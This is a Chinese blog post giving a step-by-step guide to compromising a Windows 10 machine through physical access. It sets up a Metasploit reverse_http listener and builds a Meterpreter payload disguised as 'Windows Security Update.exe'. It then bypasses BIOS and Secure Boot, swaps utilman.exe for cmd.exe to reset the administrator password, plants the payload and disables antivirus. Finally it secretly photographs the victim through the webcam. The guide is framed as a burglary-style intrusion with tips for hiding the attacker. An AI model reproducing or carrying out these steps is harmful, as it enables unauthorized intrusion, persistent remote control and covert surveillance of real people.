实战:入侵win10

最新推荐文章于 2024-01-05 07:19:24 发布
最新推荐文章于 2024-01-05 07:19:24 发布
阅读量1.3w 收藏 158
点赞数 16
文章标签: win10 USB 入侵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhaoyuhan1124/article/details/100131858
版权

简介

网上看到有人发布的关于win10的入侵流程,正好手上有两台电脑,大致说一下我的思路吧

原理

原理其实都是差不多的,即想办法把你的后门植入系统,然后远程控制。随着win10越来越安全,如果对方防备完善的话,
防火墙全开,远程端口默认禁止,附带杀毒软件,那么很难不通过物理接触感染系统。这里的思路利用win10的secure boot
提权然后拿到Administrator帐号进行入侵

步骤

简要分为以下几个步骤:
1.制作2块USB
2.物理接触主机,获得Admin权限
3.进入系统植入后门
4.入侵完成,拔出USB溜之大吉
5.远程控制,享受入侵的福利

准备

两台电脑,一台Linux,一台win10, Linux是攻击者,win10是靶机
这里不建议直接用入侵电脑控制靶机,因为会暴露目标。推荐Ali或者Amazon,GCP去租一台免费云服务器,如果
是Amazon的话学生每年有100$的免费配额可以使用,用EDU邮箱注册即可

SSH连到云服务器,安装MSF:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
sudo chmod 755 msfinstall
sudo ./msfinstall

安装screen:

sudo apt-get install screen

生成一个脚本文件:

touch automate.rc
sudo nano automate.rc

输入以下内容:

use multi/handler
set payload windows/meterpreter/reverse_http
set LHOST *你的IP*
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit -j

然后ctrl + x退出,y保存
这里把TCP数据包传输到异常端口(4444,5555)来躲避DPI(deep packet inspection) (注:这里面对win10最新版本是没有用的,实际还需要手动关闭防火墙和网络端口保护)

打开MSF:

sudo msfconsole

然后就看到经典的logo了,输入以下代码生成payload:

msfvenom --encoder cmd/powershell_base64 --payload windows/meterpreter/reverse_http LHOST=*你的IP* LPORT=4444 --arch x86 --platform win --format exe --out ~/'Windows Security Update.exe'

这个payload会以正常安全更新的exe伪装,从而达到规避用户注意的效果

把这个exe文件用ftp拉到本地,然后拷到USB1 上

去MS官网下载windows installation media,然后烧录到USB2 上

攻击

月黑风高之夜,你披着一件纯黑的夜行衣,在利用社会工程学后成功来到了机房。面对满眼的机器,你既没有用户账户也没有密码。你接近一台主机,重启后狂按F12切到BIOS设置页面,发现需要输入密码才能解锁BIOS…
你不慌不忙,很快打开https://bios-pw.org/, 然后输入机器序列号,这就解锁了,于是你把secure boot关掉,保存设置后关机
插上USB2,启动按F12选择USB boot,然后顺理成章的进入了系统安装界面(蓝色屏幕),这时候不要继续:

shift + F10

调出CMD,发现是X:,于是:

cd C:
cd windows\system32
dir

确认有一个文件叫做utilman.exe,这个文件本来是可以在开机登录界面用的,用来调节亮度等信息,普通用户也可以接触
输入:

mv utilman.exe utilman.exe.bak
cp cmd.exe utilman.exe

覆盖掉原文件,原来的utilman文件备份起来
重新正常启动,然后进入win10登录页面,点击右下角的ease of access,奇迹出现了,弹出一个cmd对话框,而且还是管理员权限的
输入:

net user administrator *password*

注意替换password,就重设了默认管理员的密码,登进去
插入USB1,把Windows Security Update.exe放到start menu/program下
关闭防火墙和杀毒软件,关闭网络和端口保护
然后把utilman复原:
打开管理员cmd

mv utilman.exe.bak utilman.exe

关机,拔出USB溜之大吉

入侵后

主机已经成功被你入侵,ssh连到云服务器,然后输入:

sudo screen msfconsole -r ~/automate.rc

进行监听
假设对方完全不知道自己被入侵,于是打开电脑,这时候云服务器输入:

sessions

可以看到有一个对应的Id以及对应的IPV4地址
输入:

sessions -i 1

选择第一个目标
然后就可以拿到shell了

webcam_list

会列出摄像头列表

webcam_snap -i 1 -v false

用第一个摄像头拍照,照片就存储在云服务器上

东方侧卫
关注
  • 16
    点赞
  • 158
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
windows局域网的一个经典的入侵方法
11-22
然后在cmd底下输入 telnet 对方ip地址 就会显示对方的一个cmdshell了,当然这里有个小技巧,如果你不知道对方ip怎么办。很简单cmd下输入net view 可以查看到局域网计算机名..................
如何使用kali来入侵(渗透)一台windows
最新发布
zz12345600354的博客
06-05 540
工具:一台带有kali linux系统的虚拟机,一个聪明的大脑开始前我们先需要将kali虚拟机改为桥接网络模式,否则会导致渗透失败1.打开虚拟机,点击虚拟机2.点击设置3.点击网络适配器,看左边点击桥接模式,点击确定即可好了,现在我们就要正式渗透一个windows系统啦,兴不兴奋?1.打开虚拟机2.打开终端,输入sudo su进入root用户权限3.进入root权限后输入ifconfig查看本机ip地址,eth0旁边192开头的为本机ip。
kali linux外网渗透指定ip,kali Linux局域网渗透之win10
weixin_39796152的博客
05-04 4243
kali机:192.168.198.134win10:192.168.198.1我们先来查看下自己的IP地址watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (587.31 KB, 下载次数: 15)2020-1-1...
入侵局域网电脑
擅长写bug,摆烂,白日梦。
12-19 7431
方法一: 1.取得对方IP地址如XX.XX.XX.XX,方法太多不细讲了。 2.判断对方上网的地点,开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称,开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM,将其改名为LMHOSTS,删除其内容,将对方的IP及电脑名按以下格式写入文件: X
内网渗透之 windows 基础
qq_49433473的博客
10-16 4358
windows用户、组、SID以及基本命令,了解windows 认证及密码、windows UAC机制、认识 windows ASR以及Windows Applocker,Token的组成,Windows PowerShell的使用与绕过方式、最后认识域
msf win10系统攻击
WEB渗透测试 从入门到萌新
10-02 4717
win10系统攻击msf
Kali Linux-Metasploit入侵Windows10系统
冷色调的夏天的博客
08-01 3万+
Kali Linux-Metasploit入侵Windows10 写在前文 距离上一次写KALI黑客攻防的博文已是去年这个时候了 之所以再次动手写这类的文章一是因为兴趣,二是看到网上五花八门的文章都是复制粘贴过来的,而且并没有写的很清楚,因此就有了本篇博客的出现 免责声明 切勿根据本文做违法之事,如做违法之事皆于博主本人无关! 实验环境 以下环境可以是两台真实物理机,也可以是一台物理机安装虚拟机 上述两种情况我均已尝试成功,由于在一台电脑上写博文较为方便 因此之后的截图是在一台物理机上的。 KALI:(攻
经典利用永恒之蓝漏洞对Windows操作系统进行攻击
qq_46202048的博客
11-25 1万+
利用永恒之蓝对Windows进行攻击 环境搭建:kali、Windows server 2008R2、Windows 7,其中Windows server 2008R2\WIN7为靶机。 首先简单介绍一下什么是永恒之蓝,永恒之蓝【Eternal Blue】爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到
Win32缓冲区溢出实战.7z
10-19
《Win32缓冲区溢出实战》是一本深入探讨计算机安全领域中重要概念的书籍,主要聚焦于Windows 32位系统中的缓冲区溢出漏洞利用技术。缓冲区溢出是编程中的一个常见错误,当程序尝试写入超过分配内存空间的数据时,就...
0x10.第十课 Metaspoilt使用CVE-2018-8120 对各类操作系统的提权.pdf
06-24
CVE-2018-8120是针对部分Windows系统中win32k.sys组件的一个漏洞。该漏洞发生在NtUserSetImeInfoEx()系统服务函数中,该函数未正确验证内核对象中的空指针,导致普通应用程序可以在内核模式下执行任意代码。 **受...
win10 永恒之黑复现
niqiu320的博客
05-31 1790
永恒之黑复现 一:漏洞简介 漏洞原理: SMB远程代码执行漏洞 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。 Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数
kali对win10入侵测试
weixin_48900801的博客
03-19 3945
kali 对win10入侵及提权测试 在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。 一、对windows 10入侵测试 环境 攻击机:Kali Linux 2019 ip:192.168.245.143 目标主机:Windows 10 ip:192.168.245.133 1.生成exe文件,在目标主机
Kali Linux渗透测试--windows 10入侵和提权过程
热门推荐
无崖子的博客
08-21 3万+
在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。 一、Metasploit对windows 10入侵测试 环境
kali攻击命令大全_利用msf攻击win10
weixin_35513543的博客
11-27 1万+
攻击环境:攻击者系统:虚拟机下kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing注意点: 攻击者的虚拟机网络模式应选择桥接模式。准备工作完成,可以开始内网渗透之旅了。step-1首先我们先...
Kali MSF攻击Win10
nlj1860453的博客
01-05 1222
如果没有问题,它会打开监听,现在我们在Windows上运行木马文件,Windows如果没有任何反应,只是鼠标转圈圈,MSF输出了“meterpreter>“字样的时候,攻击就成功了!运行后就可以看到此路径下有一个叫“shell.exe”的可执行文件,把他拖到Windows上(实际情况是我爸的电脑,可以使用社会工程学上传上去),这一步就大功告成了!我Windows的IP是192.168.1.1*,我kali的IP是192.168.1.*。如果你的虚拟机是VM虚拟机,那么你下载VM图标的,其它虚拟机以此类推。
a2zs win10
11-20
a2zs是一款Win10软件,它是一个全功能的系统优化工具。它的全称是“A to Z System Optimization Suite for Windows 10”,意为“针对Windows 10的A到Z系统优化套件”。 a2zs Win10能够帮助用户提高电脑性能,优化系统设置,清理无用文件,修复错误和漏洞,提供实时保护等功能。通过使用a2zs Win10,用户可以更好地管理和维护他们的计算机,确保其性能和稳定性。 a2zs Win10具有直观的用户界面,使用户可以轻松使用和操作。通过简单的几个步骤,用户可以扫描并修复系统中的问题,包括垃圾文件,无效的注册表项,安全隐患等。同时,a2zs Win10还可以提供实时的系统保护,避免恶意软件和病毒的入侵。 此外,a2zs Win10还提供了一些额外的实用工具,如系统备份和还原,硬件信息检测等。这些工具能够帮助用户更好地管理和保护他们的计算机。 总的来说,a2zs Win10是一个功能全面的系统优化工具,适用于Windows 10操作系统。通过使用它,用户可以改善计算机性能,优化系统设置,保护系统安全,并提供其他实用工具来管理和维护计算机。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值